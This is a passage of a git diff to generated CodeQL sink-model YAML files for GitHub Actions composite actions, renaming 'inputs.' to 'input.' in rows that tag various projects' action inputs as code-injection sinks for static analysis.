"input.torch-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index b7a664d512f3..62b31c2d3ef9 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lightning-ai/torchmetrics", "*", "inputs.pypi-dir", "code-injection", "generated"] - - ["lightning-ai/torchmetrics", "*", "inputs.torch-url", "code-injection", "generated"] - - ["lightning-ai/torchmetrics", "*", "inputs.pytorch-version", "code-injection", "generated"] \ No newline at end of file + - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "input.torch-url", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "input.pytorch-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index e86f7432a48a..427b75730abe 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["linkerd/linkerd2", "*", "inputs.component", "code-injection", "generated"] - - ["linkerd/linkerd2", "*", "inputs.docker-registry", "code-injection", "generated"] - - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-username", "code-injection", "generated"] - - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-pat", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.docker-registry", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.docker-ghcr-username", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel 
diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index 164ba02c42bf..441913730fa1 100644 --- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["logseq/publish-spa", "*", "inputs.accent-color", "code-injection", "generated"] - - ["logseq/publish-spa", "*", "inputs.theme-mode", "code-injection", "generated"] - - ["logseq/publish-spa", "*", "inputs.graph-directory", "code-injection", "generated"] - - ["logseq/publish-spa", "*", "inputs.output-directory", "code-injection", "generated"] \ No newline at end of file + - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "input.theme-mode", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "input.graph-directory", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "input.output-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index 17fb61eeeb1b..cbb2b43a2d8e 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["macvim-dev/macvim", "*", "inputs.contents", "code-injection", "generated"] - - ["macvim-dev/macvim", "*", "inputs.formula", "code-injection", "generated"] \ No newline at end of file + - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] + - ["macvim-dev/macvim", "*", "input.formula", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 8513c7da64d3..2f981b5bd63e 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mamba-org/mamba", "*", "inputs.key_suffix", "code-injection", "generated"] - - ["mamba-org/mamba", "*", "inputs.key_base", "code-injection", "generated"] - - ["mamba-org/mamba", "*", "inputs.key_prefix", "code-injection", "generated"] \ No newline at end of file + - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "input.key_base", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "input.key_prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index a4ab8f025d07..5d3d44e914c8 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml 
@@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["maplibre/maplibre-native", "*", "inputs.artifact-name", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.externalData", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testSpecArn", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testFilter", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testType", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.AWS_DEVICE_FARM_DEVICE_POOL_ARN", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.AWS_DEVICE_FARM_PROJECT_ARN", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testFile", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.appFile", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testPackageType", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.appType", "code-injection", "generated"] \ No newline at end of file + - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.externalData", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testSpecArn", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testFilter", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.AWS_DEVICE_FARM_DEVICE_POOL_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.AWS_DEVICE_FARM_PROJECT_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testFile", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.appFile", "code-injection", "generated"] + - 
["maplibre/maplibre-native", "*", "input.testPackageType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.appType", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index 7d82b2d3e9e7..7b41c1b27215 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mastodon/mastodon", "*", "inputs.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file + - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index e466e17ddb41..505fbb220058 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mavlink/qgroundcontrol", "*", "inputs.aws_secret_access_key", "code-injection", "generated"] - - ["mavlink/qgroundcontrol", "*", "inputs.aws_key_id", "code-injection", "generated"] - - ["mavlink/qgroundcontrol", "*", "inputs.artifact_name", "code-injection", "generated"] \ No newline at end of file + - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "input.aws_key_id", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "input.artifact_name", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index 53881157a232..24223da3c896 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mdanalysis/mdanalysis", "*", "inputs.extra-pip-deps", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.full-deps", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.micromamba", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.mamba", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.extra-conda-deps", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.isolation", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.build-docs", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.build-tests", "code-injection", "generated"] \ No newline at end of file + - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.full-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.micromamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.mamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.extra-conda-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.isolation", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.build-docs", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.build-tests", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index 5ee6e863db68..b529c0117f4d 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["medic/cht-core", "*", "inputs.hostname", "code-injection", "generated"] - - ["medic/cht-core", "*", "inputs.password", "code-injection", "generated"] - - ["medic/cht-core", "*", "inputs.username", "code-injection", "generated"] \ No newline at end of file + - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] + - ["medic/cht-core", "*", "input.password", "code-injection", "generated"] + - ["medic/cht-core", "*", "input.username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index 3f5a3b658c3e..6a46669f05db 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["medusajs/medusa", "*", "inputs.pathToSeedData", "code-injection", "generated"] - - ["medusajs/medusa", "*", "inputs.password", "code-injection", "generated"] - - ["medusajs/medusa", "*", "inputs.email", "code-injection", "generated"] \ No newline at end of file + - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] + - ["medusajs/medusa", "*", "input.password", "code-injection", "generated"] + - ["medusajs/medusa", "*", "input.email", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index f5c13431126c..ec2f45f31dbf 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml 
@@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["metabase/metabase", "*", "inputs.organization_name", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.github_token", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.username", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.test-args", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.clojure-version", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.include-log", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.message", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.mysql", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.postgres", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.openldap", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.maildev", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.edition", "code-injection", "generated"] \ No newline at end of file + - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.github_token", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.username", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.test-args", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.clojure-version", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.include-log", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.message", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.mysql", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.postgres", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.openldap", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.maildev", "code-injection", 
"generated"] + - ["metabase/metabase", "*", "input.edition", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index 4788f44e856a..3574855be3c0 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["metamask/action-create-release-pr", "*", "inputs.artifacts-path", "code-injection", "generated"] - - ["metamask/action-create-release-pr", "*", "inputs.created-pr-status", "code-injection", "generated"] - - ["metamask/action-create-release-pr", "*", "inputs.release-branch-prefix", "code-injection", "generated"] \ No newline at end of file + - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "input.created-pr-status", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "input.release-branch-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index 7c66229c1746..4ee1b878e54b 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["metamask/action-npm-publish", "*", "inputs.subteam", "code-injection", "generated"] \ No newline at end of file + - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index 9eb3bdcf5ebb..8453a2d415c6 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/fluentui", "*", "inputs.workspaces", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index 0db95acd5cd2..dc86b7959812 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/playwright", "*", "inputs.report_dir", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.connection_string", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.blob_prefix", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.output_dir", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.path", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.namePrefix", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.connection_string", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.blob_prefix", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.output_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.path", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.namePrefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index 785384aa2073..ca9cc034d10f 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/wsl", "*", "inputs.comment", "code-injection", "generated"] - - ["microsoft/wsl", "*", "inputs.similar_issues_text", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] + - ["microsoft/wsl", "*", "input.similar_issues_text", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index 24c4fb4bc707..b8aecfd5e3dc 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["milvus-io/milvus", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index 72575eb73684..e7ac083da836 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mlflow/mlflow", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file + - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index b2b49fbba09c..5cac21a07514 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["modin-project/modin", "*", "inputs.parallel", "code-injection", "generated"] - - ["modin-project/modin", "*", "inputs.runner", "code-injection", "generated"] - - ["modin-project/modin", "*", "inputs.activate-environment", "code-injection", "generated"] \ No newline at end of file + - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] + - ["modin-project/modin", "*", "input.runner", "code-injection", "generated"] + - ["modin-project/modin", "*", "input.activate-environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 6755f0d773ce..83e1345edf20 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mozilla/addons-server", "*", "inputs.run", "code-injection", "generated"] - - ["mozilla/addons-server", "*", "inputs.push", "code-injection", "generated"] \ No newline at end of file + - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] + - ["mozilla/addons-server", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index 1b55ab2d5490..8708afa3f3bb 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mozilla/bedrock", "*", "inputs.", "code-injection", "generated"] \ No newline at end of file + - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index 84401828721d..e4f1637603e8 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mozilla/sccache", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index 35804a87f055..f8b636c46365 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["msys2/setup-msys2", "*", "inputs.systems", "code-injection", "generated"] \ No newline at end of file + - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index 981fe0fd3485..f51d784d7c1a 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mumble-voip/mumble", "*", "inputs.arch", "code-injection", "generated"] - - ["mumble-voip/mumble", "*", "inputs.type", "code-injection", "generated"] - - ["mumble-voip/mumble", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "input.type", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index 6c984a676d06..ac6af801a0e5 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nasa/fprime", "*", "inputs.location", "code-injection", "generated"] \ No newline at end of file + - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index 1138d37fb5fa..fb676663019e 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nats-io/nats-server", "*", "inputs.label", "code-injection", "generated"] - - ["nats-io/nats-server", "*", "inputs.hub_password", "code-injection", "generated"] - - ["nats-io/nats-server", "*", "inputs.hub_username", "code-injection", "generated"] \ No newline at end of file + - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "input.hub_password", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "input.hub_username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 1418299b39ab..503386ea3d47 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nearform-actions/optic-release-automation-action", "*", "inputs.build-command", "code-injection", "generated"] - - ["nearform-actions/optic-release-automation-action", "*", "inputs.actor-name", "code-injection", "generated"] - - ["nearform-actions/optic-release-automation-action", "*", "inputs.actor-email", "code-injection", "generated"] \ No newline at end of file + - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "input.actor-name", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "input.actor-email", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index fb67f66ce62c..6d48d32e9faf 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nektos/act", "*", "inputs.test_input_optional", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.composite-input", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.some", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.test_input_required_with_default_overriden", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.test_input_required_with_default", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.test_input_optional_with_default_overriden", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.test_input_required", "code-injection", "generated"] \ No newline at end of file + - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] + - ["nektos/act", "*", "input.composite-input", "code-injection", "generated"] + - ["nektos/act", "*", "input.some", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_required_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_required_with_default", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_optional_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_required", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index 12aa48431db9..ae6d1fcc1e83 100644 
--- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["neo4j-contrib/neo4j-apoc-procedures", "*", "inputs.project-name", "code-injection", "generated"] - - ["neo4j-contrib/neo4j-apoc-procedures", "*", "inputs.gradle-command", "code-injection", "generated"] \ No newline at end of file + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.gradle-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index 336af4b814b3..48b982257211 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml 
